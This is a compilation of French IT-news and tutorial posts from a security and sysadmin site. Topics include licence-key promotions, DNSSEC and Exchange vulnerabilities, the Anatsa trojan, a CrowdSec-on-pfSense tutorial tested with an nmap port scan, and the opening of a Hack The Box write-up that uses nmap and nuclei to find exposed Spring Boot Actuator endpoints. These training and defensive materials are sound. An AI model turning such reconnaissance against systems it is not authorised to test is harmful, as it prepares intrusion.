En ce début avril, notre partenaire GoDeal24 vient de lancer une nouvelle vente flash sur les licences Microsoft, que ce soit pour Office ou Windows ! Vous pouvez retrouver un ensemble d'offres synonymes de tarifs réduits sur les licences !
Si vous aviez manqué les précédentes ventes flash, alors voilà l'occasion de vous rattraper. Sachez que vous pouvez retrouver toutes les offres de cette vente flash spéciale Office sur cette page. Il y a également des offres pour des licences pour 50 ou 100 machines, ce qui est assez rare.
Microsoft Office pour 1, 2 ou 5 ordinateurs, pour Windows ou Mac
GoDeal24 propose des licences commerciales (plusieurs ordinateurs) et des licences OEM (associées au matériel sur lequel l'activation aura lieue la première fois). Le mode d'activation est différent, mais les fonctionnalités sont les mêmes. Conformément à la décision de la Cour de justice de l'Union européenne, les clés de logiciels d'occasion peuvent être vendues dans l'Union européenne en toute légalité.
Je vous rappelle que le paiement sur ce site peut être effectué à partir d'un compte PayPal ou par carte bancaire. Les offres présentées dans cet article sont limitées dans le temps et il s'agit de licences OEM. Ces offres sont gérées directement par le site Godeal24.com. Sur le site TrustPilot, il y a 94% d'évaluations 5 étoiles pour GoDeal24.
Si vous avez une question, que ce soit de l'avant-vente ou de l'après-vente, je vous invite à contacter le support du site godeal24.com à l'adresse e-mail suivante :[email protected]
Célébrons l'arrivée du printemps 2024 avec cette nouvelle vente flash de notre partenaire GoDeal24 ! A cette occasion, le tarif des licences Microsoft et de certains logiciels est très intéressant !
Les offres sont très nombreuses, que ce soit sur les produits Microsoft Office, Windows 10, Windows 11, etc... Et GoDeal24 propose même des packages de 50 ou 100 clés de licences pour Windows et Office ! Sachez que vous pouvez retrouver toutes les offres de cette vente flash sur cette page.
Microsoft Office, Visio et Project en tête d'affiche !
GoDeal24 propose des licences commerciales (plusieurs ordinateurs) et des licences OEM (associées au matériel sur lequel l'activation aura lieue la première fois). Le mode d'activation est différent, mais les fonctionnalités sont les mêmes. Conformément à la décision de la Cour de justice de l'Union européenne, les clés de logiciels d'occasion peuvent être vendues dans l'Union européenne en toute légalité.
Je vous rappelle que le paiement sur ce site peut être effectué à partir d'un compte PayPal ou par carte bancaire. Les offres présentées dans cet article sont limitées dans le temps et il s'agit de licences OEM. Ces offres sont gérées directement par le site Godeal24.com. Sur le site TrustPilot, il y a 98% d'évaluations positives.
Si vous avez une question, que ce soit de l'avant-vente ou de l'après-vente, je vous invite à contacter le support du site godeal24.com à l'adresse e-mail suivante :[email protected]
Notre partenaire GoDeal24 propose une nouvelle vente flash avec des prix très intéressants sur les licences ! Comme souvent, ce sont des promotions sur les licences Microsoft, mais aussi sur d'autres applications comme AdGuard et Ashampoo PDF Pro.
Une page du site GoDeal24 regroupe l'ensemble des offres de cette vente spéciale Valentine Day :voir toutes les promos.
GoDeal24 propose des licences commerciales (plusieurs ordinateurs) et des licences OEM (associées au matériel sur lequel l'activation aura lieu la première fois). Le mode d'activation est différent, mais les fonctionnalités sont les mêmes. Conformément à la décision de la Cour de justice de l'Union européenne, les clés de logiciels d'occasion peuvent être vendues dans l'Union européenne en toute légalité.
Je vous rappelle que le paiement sur ce site peut être effectué à partir d'un compte PayPal ou par carte bancaire. Les offres présentées dans cet article sont limitées dans le temps et il s'agit de licences OEM. Ces offres sont gérées directement par le site Godeal24.com. Sur le site TrustPilot, il y a 98% d'évaluations positives.
Si vous avez une question, que ce soit de l'avant-vente ou de l'après-vente, je vous invite à contacter le support du site godeal24.com à l'adresse e-mail suivante :[email protected]
Depuis plus d’une décennie, Amazon AWS s’est imposé comme le leader mondial incontesté des plateformes de cloud public, devant Microsoft Azure, Google Cloud Platform (GCP) et Alibaba Cloud. En 2023, AWS a fait l’objet d’une légère baisse des parts du marché en faveur d’Azure et des experts estiment que Microsoft pourrait devenir le plus grand fournisseur de services cloud à partir de 2026.
La course à l'intelligence artificielle
Mais qu’est-ce qui explique ce revirement ? Tout porte à croire que l’engouement du grand public pour l’intelligence artificielle suscité par ChatGPT en 2023 a été très favorable pour Microsoft qui travaille en partenariat avec OpenAI depuis 2019. En effet, dans la foulée du succès de ChatGPT, Microsoft a investi massivement en l'IA et lancé plusieurs nouveaux produits qui s’appuient sur l’intelligence artificielle générative.
L'année 2023 fut l'occasion pour Microsoft de relancer le moteur de recherche Bing en y intégrant l'assistant Copilot Bing Chat, un chatbot conçu à partir d'un modèle construit sur ChatGPT. L'offre de Copilot a également été bonifiée et son ajout à Microsoft 365 sous forme d'abonnement a reçu un accueil favorable et promet d'être très lucrative.
Parallèlement, Satya Nadella notait une nette augmentation des utilisateurs de la plateforme Azure AI, un service qui comprend une suite de solutions telles qu'Azure Machine Learning, Azure Cognitive Services et Azure Applied AI Services. À cet effet, Microsoft a ajouté de nombreux GPUs à ses centres de données pour que les clients puissent mettre en place leurs propres modèles d'IA dans Azure.
Pour sa part, Amazon a annoncé en septembre dernier un partenariat assorti d'un investissement de 4 milliards de dollars avec la startup d'intelligence artificielle Anthropic qui développe « Claude », un chatbot similaire à ChatGPT. Il n'en demeure pas moins que ce partenariat n'a pas été aussi retentissant que celui de Microsoft avec OpenAI et, durant la dernière année, le grand public a massivement adopté ChatGPT qui est devenu une référence.
Microsoft accélère la mise en place de Copilot
En janvier 2024, Microsoft a annoncé que tous les claviers Windows seraient désormais munis d’une touche dédiée à Copilot, ce qui va inciter fortement les utilisateurs à privilégier les technologies OpenAI/Microsoft au détriment des solutions concurrentes. De plus, Microsoft a déjà ajouté Copilot aux derniers correctifs Windows et de nombreux systèmes disposent maintenant du logiciel en version préliminaire.
La course à l'IA est devenue le nerf de la guerre des grands fournisseurs de services de cloud public. Il sera intéressant de voir si les experts ont vu juste en prévoyant qu'Azure pourrait dépasser AWS en 2026 en termes de revenus et de part de marché du cloud computing. D'ici là, plusieurs innovations sont à prévoir dans le domaine de l'IA, et le monde de l'informatique connaîtra de nombreuses transformations qui vont créer de belles opportunités.
OpenAI et l'intelligence artificielle continuent de nous étonner, de nous surprendre ! Sora, c'est le nom d'une nouvelle IA générative capable de générer des vidéos à partir d'une simple description par texte.
Déjà à l'origine de plusieurs intelligences artificielles comme ChatGPT, que vous connaissez tous, et DALL-E qui sert à générer des images, OpenAI vient d'ajouter une nouvelle IA à son arsenal d'outils : Sora. Il s'agit d'une IA générative de type "text-to-video".
L'idée est simple : vous avez un prompt, vous saisissez la description de la vidéo que vous souhaitez obtenir, et Sora s'occupe du reste. Sora est capable de générer des vidéos allant jusqu'à 60 secondes.
OpenAI a mis en ligne plusieurs exemples pour mettre en avant les performances de Sora. Alors, bien sûr, l'entreprise américaine a pris soin de sélectionner les meilleurs résultats, mais nous pouvons voir que cette IA à un énorme potentiel et que ce sera forcément révolutionnaire.
En s'appuyant en partie sur DALL-E, Sora peut :
Générer des vidéos, intégralement
Compléter des vidéos existantes
Animer une image fixe afin de la rendre vivante
Actuellement, Sora est accessible pour certaines personnes uniquement, afin que le modèle puisse être testé. OpenAI veut l'optimiser, évaluer les risques, et le sécuriser pleinement avant de le rendre accessible au plus grand nombre. En effet, Sora est une aubaine pour la création de "fakes" et de contenus trompeurs. Il est essentiel qu'OpenAI prenne les devants pour que cette IA ne participe pas au fléau de la désinformation.
Pour voir les exemples de vidéos générées par Sora, vous pouvez consulter le site officiel d'OpenAI sur cette page :
Sora can create videos of up to 60 seconds featuring highly detailed scenes, complex camera motion, and multiple characters with vibrant emotions. https://t.co/7j2JN27M3W
À l'avenir, j'ai bien l'impression, que nous devrons douter de toutes les images et les vidéos que l'on voit… Avons-nous vraiment besoin de cela ? Pas vraiment.
L'attaque KeyTrap, c'est le nom donné à une nouvelle vulnérabilité découverte dans DNSSEC. Elle affecte tous les services et toutes les implémentations de DNS populaires, y compris bind9, dnsmasq, PowerDNS Recursor ainsi que le serveur DNS de Windows Server. Faisons le point.
Pour rappel, DNSSEC est une extension du DNS qui améliore la sécurité du service DNS grâce à l'ajout de signatures afin de pouvoir authentifier les réponses. Nous en avions parlé dans ce tutoriel : comment configurer DNSSEC sur Windows Server 2022 ?
En ce qui concerne la faille de sécurité KeyTrape, elle est associée à la référence CVE-2023-50387, et elle a été découverte par des chercheurs et experts allemands, issus de l'institut de recherche ATHENE, de l'université Goethe de Francfort, du Fraunhofer SIT et de l'université technique de Darmstadt.
D'après eux, cette vulnérabilité est présente dans DNSSEC depuis plus de 20 ans ! Elle est liée au fonctionnement de DNSSEC, notamment dans la gestion des clés cryptographiques. En exploitant cette vulnérabilité, il est possible d'effectuer un déni de service sur le système DNS pris pour cible. En effet, à partir d'une seule requête, la réponse retournée par le service DNS peut être retardée de 56 secondes à 16 heures (en fonction du type de service).
Quels sont les services et serveurs DNS affectés ?
D'après les chercheurs : "Avec KeyTrap, un attaquant pourrait complètement désactiver de grandes parties de l'Internet mondial", preuve que cette vulnérabilité est importante. Ceci se justifie par le fait qu'elle impacte les fournisseurs de services DNS les plus importants, tels que Google et Cloudflare.
Voici un tableau publié par les chercheurs en sécurité (visible dans ce rapport) où l'on peut voir quelles sont les applications et les services vulnérables :
Depuis novembre 2023, des travaux sont en cours chez Google, Cloudflare, mais également chez Akamai pour déployer des mesures d'atténuations permettant de se protéger de cette vulnérabilité liée au fonctionnement de DNSSEC. Du côté de chez Microsoft, il semblerait que la mise à jour cumulative pour Windows Server déployée à l'occasion du Patch Tuesday de Février 2024 permette de corriger cette vulnérabilité.
D'après un rapport d'Akamai : "environ 35 % des utilisateurs d'Internet basés aux États-Unis et 30 % des utilisateurs d'Internet dans le monde utilisent des résolveurs DNS qui utilisent la validation DNSSEC et sont donc vulnérables à KeyTrap.".
Dans ce tutoriel, nous allons voir comment installer CrowdSec sur un pare-feu PfSense dans le but de bloquer les adresses IP malveillantes, notamment à l'origine d'attaques brute force, de scans de port et de recherche de vulnérabilités web (HTTP).
CrowdSec, que nous avons déjà abordé au sein de plusieurs articles, est une solution gratuite et open source capable de détecter et bloquer les attaques à destination des machines, grâce à la prise en charge de nombreux scénarios de détection. CrowdSec prend en charge Linux, Windows Server, FreeBSD, et il peut être mis en place sur certains firewalls comme PfSense et OPNSense.
Lorsqu'il est en place sur un firewall PfSense, CrowdSec va analyser plusieurs journaux du système pour identifier les comportements malveillants et bloquer les adresses IP associées. En complément, les adresses IP présentes dans les listes communautaires de CrowdSec sont également bloquées.
Il est important de préciser que si vous utilisez HAProxy en tant que reverse proxy sur un pare-feu PfSense, vous pouvez également configurer CrowdSec pour qu'il surveille les logs de HAProxy pour détecter les attaques Web. C'est très intéressant, et ce scénario sera probablement détaillé dans un article complémentaire.
Pour vous aider à mettre en place ce tutoriel, voici quelques ressources supplémentaires :
Pour suivre ce tutoriel, vous avez besoin d'un pare-feu PfSense déjà en place car nous n'allons pas voir l'installation. Pour ceux qui le souhaitent, vous pouvez utiliser le Lab basé sur VMware Workstation comme point de départ, si vous désirez vous entrainer. C'est ce que je fais pour ma part.
En complément, une machine virtuelle sous Kali Linux sera utilisée pour simuler une attaque (en se positionnant côté WAN). Mais, vous pouvez directement utiliser votre hôte physique sans problème (sous Windows, vous pouvez installer l'outil Zenmap, par exemple).
III. Installer CrowdSec sur PfSense
A. Accéder au shell de PfSense
La première étape consiste à installer un ensemble de paquets sur le pare-feu PfSense afin de pouvoir intégrer CrowdSec. Pour exécuter des commandes shell sur PfSense, il y a trois options :
Utiliser le mode console (via l'hyperviseur, par exemple)
Utiliser la console distante via une connexion SSH
Utiliser la fonction "Command Prompt" accessible via l'interface web de PfSense (dans le menu "Diagnostics").
Dans le cas présent, je pensais utiliser la fonction "Command Prompt" mais les commandes ne sont pas passées. Il est préférable de passer directement via la console.
Si vous avez besoin d'activer le SSH, cliquez sur "System" puis "Advanced". À cet endroit, il y a une section "Secure Shell" où vous pouvez activer le SSH et définir un port personnalisé.
Ensuite, vous devez vous connecter en SSH à PfSense. Vous pouvez utiliser le client OpenSSH de Windows ou Linux, ou une autre application telle que PuTTY.
Voici comment se connecter sur un pare-feu avec l'adresse IP "192.168.100.1" avec le compte "admin", où le port SSH est 9922.
La première fois, vous devez accepter l'empreinte en indiquant "yes". Ensuite, saisissez le mot de passe et validez. Pour accéder au shell, choisissez l'option "8".
B. Installer CrowdSec, le paquet PfSense et le bouncer Firewall
Désormais, il va falloir installer CrowdSec, son paquet pour PfSense, le bouncer Firewall et des dépendances.
Pour cela, vous devez récupérer les liens vers les dernières versions en vous référant au GitHub de CrowdSec. Autrement dit, les commandes "pkg add" ci-dessous pointent vers les versions actuelles, mais ce ne seront pas forcément les dernières lorsque vous allez suivre ce tutoriel.
Avant d'installer les paquets, nous allons définir la variable "IGNORE_OSVERSION" à "yes" pour éviter les avertissements lors de l'installation des paquets (dû à la différence entre la version du paquet et la version de FreeBSD sur laquelle est basée PfSense).
Dans la console, saisissez cette commande :
setenv IGNORE_OSVERSION yes
Puis exécutez les commandes suivantes pour télécharger et installer les paquets :
L'installation de CrowdSec est effectuée à l'emplacement suivant :
/usr/local/etc/crowdsec/
Par la suite, si vous avez besoin de redémarrer CrowdSec, utilisez cette commande (adaptez également pour l'arrêter / le démarrer) :
service crowdsec.sh restart
Avant de poursuivre, vous devez redémarrer votre pare-feu PfSense, sinon CrowdSec ne sera pas actif, et la ligne de commande "cscli" indisponible également.
Voilà, vous venez d'installer CrowdSec sur PfSense !
IV. Configurer CrowdSec sur PfSense
Sachez que tout le jeu de commandes habituel permettant de configurer et d'utiliser CrowdSec est disponible : cscli. Vous pouvez aussi faire l'essentiel de la configuration à partir de l'interface d'administration de PfSense.
À partir du menu, sous "Services", choisissez "CrowdSec".
Par défaut, et c'est plutôt appréciable, CrowdSec est préconfiguré pour être opérationnel et être capable d'analyser les journaux de PfSense. Pour en savoir plus sur les fichiers de logs parsés par CrowdSec, regardez ces deux fichiers :
Vous devez tout de même réviser la configuration proposée...
Vous pouvez constater que la "Local API" (LAPI) est activée. Elle est utilisée par CrowdSec pour le partage d'informations entre plusieurs instances. Ici, c'est en local. Au cas où il s'agirait d'un déploiement avec plusieurs machines qui s'échangent les informations (adresses IP bloquées, par exemple), il faudrait s'intéresser à la section "Remote API". Ici, ce n'est pas nécessaire.
Descendez dans la page... Nous pouvons constater que CrowdSec est actif sur toutes les interfaces de PfSense, en entrée (flux malveillants entrants). Il est important de préciser que les règles de pare-feu créées par CrowdSec ne sont pas visibles dans la liste des règles de PfSense que l'on peut afficher en mode web, mais uniquement en ligne de commande.
Cliquez sur le bouton "Save" pour valider la configuration et démarrer CrowdSec.
Désormais, dans le menu "Status", cliquez sur "CrowdSec Status".
Ici, vous pouvez visualiser l'état général de CrowdSec, ainsi qu'obtenir la liste des bouncers, des collections, des scénarios, etc... Mais aussi lister les dernières alertes et les décisions. Pour rappel, une décision correspond au fait de bannir une adresse IP (action par défaut).
Voici la liste des collections actuellement installées :
Nous pourrions en ajouter d'autres à partir de la ligne de commande (cscli collections install). Ceci peut s'avérer utile si votre pare-feu PfSense héberge d'autres services, comme un reverse proxy HAProxy, par exemple.
Enfin, il y a la section "CrowdSec Metrics" accessible via le menu "Diagnostics" de PfSense qui donne des statistiques plus détaillées sur l'activité de CrowdSec sur notre pare-feu. Nous pouvons entre autres visualiser quels sont les fichiers de log analysés par CrowdSec et obtenir des statistiques à leur sujet.
V. Simuler un scan de ports sur PfSense
A partir de l'outil NMAP, nous allons pouvoir réaliser un scan de ports sur l'adresse IP de l'interface WAN du PfSense. Dans cet exemple, il s'agit de "192.168.1.60", mais en production, il s'agirait de votre adresse IP publique. Vous pouvez utiliser NMAP sur Linux, via WSL, ou sinon en mode graphique sous Windows avec Zenmap.
Voici la commande à exécuter pour faire un scan de port à la recherche de services fréquents :
nmap -sV 192.168.1.60
Le scan a permis de détecter que le port 80/tcp (http) était ouvert. C'est normal, car une règle de NAT redirige les flux HTTP vers un serveur Web en DMZ. Il n'a pas obtenu d'autres réponses.
Pour cause, la machine à l'origine du scan a été bannie par CrowdSec. Nous pouvons le voir dans le menu "Status" puis "CrowdSec", en accédant à l'onglet "Decisions". Cette adresse IP a été bannie à cause du scan de port, comme indiqué : pf-scan-multi_ports.
L'information est bien entendu visible à partir de la ligne de commande :
cscli decisions list
Nous pouvons constater que CrowdSec est opérationnel et réactif sur notre pare-feu PfSense ! C'est un gros plus pour la protection de notre réseau !
VI. Conclusion
Suite à la mise en place de CrowdSec sur notre pare-feu PfSense, nous sommes en mesure de détecter et bloquer les adresses IP malveillantes. Ainsi, si une machine vient frapper à la porte de votre pare-feu pour voir quels sont les services ouverts, elle sera directement bannie.
Par la suite, nous verrons comment aller plus loin dans la détection et la configuration s'il y a un reverse proxy HAProxy en place sur le pare-feu PfSense. Pour aller plus loin, nous pourrions aussi déployer CrowdSec sur les serveurs de notre infrastructure et faire en sorte pour que toutes les décisions et alertes soient synchronisées entre les hôtes, en nous appuyant sur l'instance CrowdSec déployée sur PfSense comme point central.
Magika, c'est le nom du nouvel outil de Google mis à disposition de la communauté et qui permet d'identifier les types de fichiers, rapidement, grâce à l'intelligence artificielle. Voici ce qu'il faut savoir !
Avec Magika, vous pouvez identifier facilement et rapidement les types de fichiers binaires et textuels. Déjà utilisé en interne par Google, il peut être utilisé par tout le monde dès à présent. Il s'installe sur une machine en locale en tant que paquet Python (via "pip install magika"), mais vous aussi l'utiliser à partir de ce site de démo. "Magika est déjà utilisé pour protéger des produits tels que Gmail, Drive et Safe Browsing, ainsi que par notre équipe VirusTotal", précise Google.
À partir d'un bel échantillon de 1 million de fichiers, Google a comparé les performances de Magika avec d'autres outils tels que Exiftool, Trid, File mime et File magic. L'entreprise américaine affirme que : "Magika surpasse les méthodes conventionnelles d'identification de fichiers en offrant une augmentation globale de 30% de la précision et jusqu'à 95% de précision supplémentaire sur des contenus traditionnellement difficiles à identifier, mais potentiellement problématiques, tels que VBA, JavaScript et PowerShell."
Magika parvient à être plus performant grâce à l'intelligence artificielle et au fait qu'il a été entrainé sur énormément de données. Pour être plus précis, il s'appuie sur ce que l'on appelle un "deep-learning model" et il est capable d'identifier le type d'un fichier en quelques millisecondes.
Voici le tableau récapitulatif publié par Google sur cette page :
Je n'ai pas encore testé cet outil, mais il me semble très intéressant ! Attention, nous parlons bien d'identifier le type d'un fichier, ce qui n'indique pas s'il s'agit d'un fichier malveillant ou non, même si cela peut être un premier signe. L'exemple ci-dessous, publié par Google, montre que l'outil peut afficher le résultat pour l'ensemble des fichiers contenus dans un dossier :
Pour Google, le déploiement de l'intelligence artificielle à grande échelle au sein des outils et services va jouer un rôle au niveau de la cybersécurité et faire pencher la balance en faveur des défenseurs, face aux attaques.
Suite à son rachat par Broadcom, VMware a subi de nombreux changements qui sont impactants pour les clients, les utilisateurs et les distributeurs des solutions VMware. Dernière annonce en date : la fin de la version gratuite de VMware ESXi Free, pourtant très répandue. En effet, elle pouvait être utilisée pour évaluer la solution sans limite de temps, bénéficier d'un environnement de test, déployer un serveur dédié dans le Cloud ou encore en production par certaines petites et moyennes entreprises.
Désormais, si vous utilisez VMware ESXi Free, vous avez deux options : passer sur une version payante de VMware ESXi ou se tourner vers une alternative. Dans cet article, nous allons évoquer ces fameuses alternatives (y compris certaines payantes), sans faire la promotion d'une solution plus qu'une autre. Libre à vous de les évaluer, même si nous essaierons de publier du contenu sur ces solutions dans les semaines et mois à venir...
II. Les alternatives à VMware ESXi
A. Hyper-V
Hyper-V, c'est le nom de l'hyperviseur de Microsoft, disponible à la fois sur Windows Server et Windows (notamment sur Windows 10 et Windows 11), mais également en tant qu'Hyper-V Server, une version autonome, mais en fin de vie.
Le rôle Hyper-V est gratuit, cependant il a un impact sur le coût de la licence Windows Server. En effet, vous devez disposer d'une licence valide pour le système d'exploitation, mais en plus, votre licence Windows Server doit tenir compte du nombre de machines virtuelles que vous comptez déployer (une seule licence Windows Server Standard autorise 2 VM).
Hyper-V est une solution mature, avec de nombreuses fonctionnalités, et il est capable de faire tourner des machines sous Windows ou Linux. La gestion des machines virtuelles s'effectue avec la console Hyper-V, qui est une sorte de client lourd, mais aussi via Windows Admin Center et PowerShell. Lorsqu'un cluster Hyper-V est déployé, une seconde console dédiée est accessible à l'administrateur système.
Ces derniers temps, nous entendons beaucoup parler de Proxmox VE car cette solution pourrait profiter de la situation actuelle pour récupérer quelques utilisateurs de VMware. Lancée en 2008, Proxmox VE (Virtual Environment) est une plateforme de virtualisation open source adaptée pour la production et les entreprises. Elle prend en charge la création et la gestion de machines virtuelles, mais aussi de conteneurs.
Proxmox VE est basé sur un noyau Linux et cette solution intègre deux technologies : KVM (Kernel-based Virtual Machine - En soit, c'est aussi une alternative) pour les machines virtuelles et LXC (Linux Containers) pour les conteneurs. La gestion s'effectue en ligne de commande ou à partir d'une interface web. En plus de ses fonctionnalités de virtualisation, Proxmox VE intègre également des fonctionnalités avancées telles que le clustering et la réplication.
Proxmox VE est largement utilisé dans le monde entier et bénéficie d'une communauté importante et active qui contribue à son développement. Aujourd'hui, c'est une solution de virtualisation à considérer au moment de faire son choix !
Né en 2018, le projet XCP-ng est une plateforme de virtualisation open source basée sur XenServer. Au même titre que VMware ESXi, c'est un hyperviseur capable de gérer et de déployer des machines virtuelles. Cette solution a été créée en réponse aux limitations et aux restrictions de Citrix XenServer, notamment en ce qui concerne certaines fonctionnalités "premium". En tant que projet open source, XCP-ng bénéficie des contributions de développeurs du monde entier et d'une communauté grandissante.
L'administration de XCP-ng s'effectue au travers d'une application cliente (un client lourd), tout en étant compatible avec Xen Orchestra, une interface web intuitive pour administrer votre infrastructure de virtualisation. Au-delà d'être une alternative à VMware ESXi, XCP-ng est devenue une sérieuse alternative à une autre solution open source : Proxmox VE.
Dans le catalogue de solutions de chez Nutanix, la véritable alternative à VMware ESXi s'appelle Nutanix AHV, un hyperviseur destiné aux entreprises. Bien que ce soit une réelle alternative à ce que propose VMware, c'est une solution payante, donc ce n'est pas forcément ce que vous allez rechercher dans le cas présent.
Nutanix propose bien une solution gratuite et communautaire nommée Nutanix Community Edition. Toutefois, il s'agit d'une solution d'hyperconvergence (HCI) proposée par Nutanix, le leader sur ce marché. Même si elle est très intéressante, elle ne sera pas adaptée à toutes les situations.
VergeIO se présente comme L'ALTERNATIVE à VMware, et c'est précisé dès que l'on arrive sur la page d'accueil du site officiel : "Quittez VMware dès maintenant : 50 % moins cher - Meilleures performances - Migration transparente".
VergeIO est une plateforme de virtualisation et d'infrastructure hyperconvergée qui vise à simplifier la gestion des centres de données et à réduire les coûts. Elle se présente sous la forme d'une solution tout-en-un qui combine les ressources de calcul, de stockage, de réseau et de virtualisation dans une seule plateforme. Il s'agit d'une solution propriétaire et payante, que vous pouvez essayer pendant 90 jours.
Terminons par oVirt, une solution open source basée sur l'hyperviseur KVM au même titre que Proxmox. En complément, oVirt s'appuie aussi sur plusieurs autres projets communautaires, notamment libvirt, Gluster, PatternFly et Ansible.
L'interface web d'administration d'oVirt permet de gérer les machines virtuelles, mais également le stockage et le réseau virtuel. Cet hyperviseur prend en charge nativement des fonctionnalités avancées intéressantes : la migration en live des machines virtuelles et des disques entre les hôtes et le stockage, ainsi que la haute disponibilité entre plusieurs hyperviseurs.
Voilà, vous connaissez les noms des principales solutions qui peuvent prendre la place de VMware ESXi Free, même si vous pouvez aussi prendre la décision de rester sur VMware ESXi, en passant sur l'offre payante. Soyons honnête : c'est probablement le choix que feront certaines entreprises, mais sachez que des alternatives existent.
Si vous souhaitez donner votre avis sur une ou plusieurs de ces solutions, n'hésitez pas à commenter cet article. Si vous connaissez d'autres solutions viables pour remplacer VMware ESXi Free, c'est pareil, n'hésitez pas à partager l'information avec un commentaire.
Depuis plusieurs mois, le cheval de Troie bancaire Anatsa cible les appareils Android, et plus particulièrement les utilisateurs européens ! Pour se propager, il s'appuie sur des applications malveillantes diffusées par le Google Play Store. Faisons le point sur cette menace.
Les chercheurs en sécurité de ThreatFabric ont mis en ligne un rapport pour alerte sur l'activité du Trojan Anatsa. D'après eux, depuis le mois de novembre 2023, il est très actif et il a déjà infecté les appareils de 150 000 utilisateurs européens. Quand il est en place, Anatsa a pour objectif de voler vos identifiants bancaires pour vider vos comptes.
On parle de cinq campagnes différentes lancées à l'encontre des utilisateurs situés au Royaume-Uni, en Allemagne, en Espagne, en Slovaquie, en Slovénie et en République tchèque. Chaque campagne a pour objectif de cibler une zone géographique bien précise. Même si cela s'est intensifié ces derniers mois, ce n'est pas la première fois qu'Anatsa s'en prend aux utilisateurs européens. Le rapport technique de TheatFabric est disponible sur cette page.
À chaque fois, l'application publiée sur le Google Play Store sert d'appât et de "dropper" pour distribuer le malware sur les appareils des victimes. Il s'agit d'un processus d'infection en plusieurs étapes qui permet de contourner les mesures de protection d'Android, jusqu'à Android 13. Par exemple, la technique employée par Anatsa abuse du service d'accessibilité d'Android en prétextant la nécessité d'avoir une autorisation d'accès pour hiberner les applications gourmandes en batterie.
Les chercheurs de ThreatFabric évoquent plusieurs applications utilisées dans le cadre de ces campagnes, notamment "Phone Cleaner – File Explorer" avec environ 10 000 téléchargements, et "PDF Reader: File Manager" avec plus de 100 000 téléchargements. Au total, les différents apps cumulent plus de 150 000 téléchargements, soit autant de victimes potentielles.
Voici la liste des 5 applications utilisées :
Phone Cleaner - File Explorer (com.volabs.androidcleaner)
PDF Viewer - File Explorer (com.xolab.fileexplorer)
PDF Reader - Viewer & Editor (com.jumbodub.fileexplorerpdfviewer)
Phone Cleaner: File Explorer (com.appiclouds.phonecleaner)
PDF Reader: File Manager (com.tragisoap.fileandpdfmanager)
Méfiez-vous avant d'installer des applications, même lorsque c'est sur le Play Store : lisez les avis, consultez l'historique, etc... Avant de cliquer sur le bouton "Installer".
À l'heure où ces lignes sont écrites, il y a au moins 28 500 serveurs de messagerie Exchange vulnérables à la nouvelle faille de sécurité critique CVE-2024-21410 patchée la semaine dernière par Microsoft. En réalité, le nombre de serveurs vulnérables pourrait être beaucoup plus élevé. Faisons le point !
À l'occasion de son Patch Tuesday de Février 2024, Microsoft a corrigé 73 failles de sécurité, ainsi que plusieurs failles zero-day. C'est notamment le cas de la CVE-2024-21410, car cette vulnérabilité présente dans Microsoft Exchange Server a été exploitée par les pirates en tant que faille zero-day avant qu'elle ne soit patchée.
Associée à un score CVSS v3.1 de 9.8 sur 10, cette faille de sécurité critique permet à un attaquant non authentifié d'élever ses privilèges en s'appuyant sur une attaque par relais NTLM ciblant un serveur Microsoft Exchange vulnérable.
Comme souvent, le service de monitoring The Shadowserver a mis en ligne quelques statistiques intéressantes pour nous indiquer combien il y a de machines potentielles vulnérables. Les serveurs Exchange étant, généralement, exposés sur Internet, il est possible de les sonder et de récupérer le numéro de version.
Ainsi, sur un total de 97 000 serveurs Exchange identifiés, il y a 28 500 serveurs qui sont vulnérables à la vulnérabilité CVE-2024-21410. Pour environ 68 500 serveurs, l'état est inconnu puisque cela dépend si les administrateurs ont appliqué ou non les mesures d'atténuation. Nous pouvons imaginer que c'est le cas pour une partie des serveurs, mais pas pour tous... Ce qui augmente forcément le nombre de serveurs vulnérables.
La France, dans le Top 5
En ce qui concerne les pays avec le plus de serveurs Exchange vulnérables, The Shadowserver a publié une liste sur cette page. Voici le Top 5 :
Pays
Nombre d'adresses IP uniques
Allemagne
22 903
États-Unis
19 434
Royaume-Uni
3 665
Pays-Bas
3 108
France
3 074
Nous savons que cette vulnérabilité est exploitée dans le cadre d'attaques. À l'heure actuelle, aucun exploit PoC public semble être disponible. Pour autant, il convient de se protéger dès que possible.
Comment se protéger ?
Sur Exchange Server 2019, vous devez installer la Cumulatice Update 14 (CU14) pour vous protéger. Pour en savoir plus sur cette vulnérabilité, et savoir comment se protéger sur les différentes versions d'Exchange Server, consultez notre article ci-dessous :
Dans cet article, je vous propose la résolution de la machine Hack The Box CozyHosting, de difficulté "Facile".
Hack The Box est une plateforme en ligne qui met à disposition des systèmes vulnérables appelées "box". Chaque système est différent et doit être attaqué en adoptant la démarche d'un cyberattaquant. L'objectif est d'y découvrir les vulnérabilités qui nous permettront de compromettre les utilisateurs du système, puis le compte root ou administrateur.
Ces exercices permettent de s’entraîner légalement sur des environnements technologiques divers (Linux, Windows, Active directory, web, etc.), peuvent être utiles pour tous ceux qui travaillent dans la cybersécurité (attaquants comme défenseurs) et sont très formateurs
Je vais ici vous détailler la marche à suivre pour arriver au bout de cette box en vous donnant autant de conseils et ressources que possible. N'hésitez pas à consulter les nombreux liens qui sont présents dans l'article.
Cette solution est publiée en accord avec les règles d'HackThebox et ne sera diffusée que lorsque la box en question sera indiquée comme "Retired".
Pour l'instant, nous ne disposons que de l'adresse IP de notre cible. Commençons par un scan réseau à l'aide de l'outil nmap pour découvrir les services exposés sur le réseau, et pourquoi pas leurs versions.
Le site web exposé par le service web est un simple site vitrine :
Je commence par lancer l'outil nuclei qui va automatiser certaines tâches de découverte relatives à des CVE, framework ou mauvaises configuration spécifiques :
Le scanner web nuclei est toujours intéressant à utiliser, quelque soit votre niveau en test d'intrusion. Il est certes loin de proposer un audit complet d'une application web, mais permet de scanner vos sites web pour un diagnostic rapide et dégrossir rapidement un test d'intrusion en boite noire. Son fonctionnement par module communautaire et très complet pour un outil open source et il renvoie rarement de faux positifs.
Assez rapidement, celui-ci découvre plusieurs points d'entrées relatifs à Springboot. Il s'agit d'un projet du framework Spring qui fournit un ensemble d'outils et de conventions pour faciliter la création de services web, d'applications back-end et de microservices. Il vise à rendre le développement d'applications basées sur Spring plus rapide et facile.
Springboot Actuator est un ensemble de fonctionnalités permettant de surveiller les applications, de collecter des métriques et comprendre le trafic ou l'état de la base de données. Il s'agit plus précisément d'une dépendance utilisée par les développeurs qui utilisent ce framework de développement. Tout cela semble fort intéressant pour un développeur, mais est-ce qu'un visiteur externe a besoin d'y accéder ? La réponse est probablement non.
